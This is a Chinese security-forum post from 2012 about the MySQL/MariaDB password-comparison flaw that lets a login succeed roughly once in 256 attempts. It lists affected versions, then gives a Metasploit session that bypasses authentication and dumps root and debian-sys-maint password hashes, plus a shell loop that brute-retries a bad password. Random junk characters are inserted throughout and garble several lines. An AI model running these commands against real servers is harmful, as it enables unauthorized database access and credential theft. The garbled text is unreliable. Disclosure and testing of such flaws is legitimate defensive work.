中国网络渗透测试联盟

标题: mysql任意用户密码概率登陆漏洞 [打印本页]

作者: admin    时间: 2012-12-20 20:11
标题: mysql任意用户密码概率登陆漏洞
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
! _3 d2 x4 N: S, M7 R5 M
# G6 F* W" C7 O# Z也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。
6 @8 M% ~+ y! q4 e# Y, u2 Y0 y
7 C0 p" d6 m/ O9 G受影响的产品:
! U* W1 K& `6 g6 d$ YAll MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
7 Q! A0 M% O% evulnerable.
1 f* B* h9 k" l6 g3 |; AMariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.. C8 m. g3 p5 u* [
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.  Q# Y( F& i+ I+ ?

9 D" n+ E! u/ h3 }6 n/ c& o, F验证方法:) _3 R6 o% V7 T1 h

( j9 Z7 v) u" k" c( r' m6 ]$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed: |: s7 d( U/ [8 n9 L
! V% \# W2 k) }4 l! b" R6 ?: M7 D
$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>7 \( e8 I) l! j, O2 m+ n/ C





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2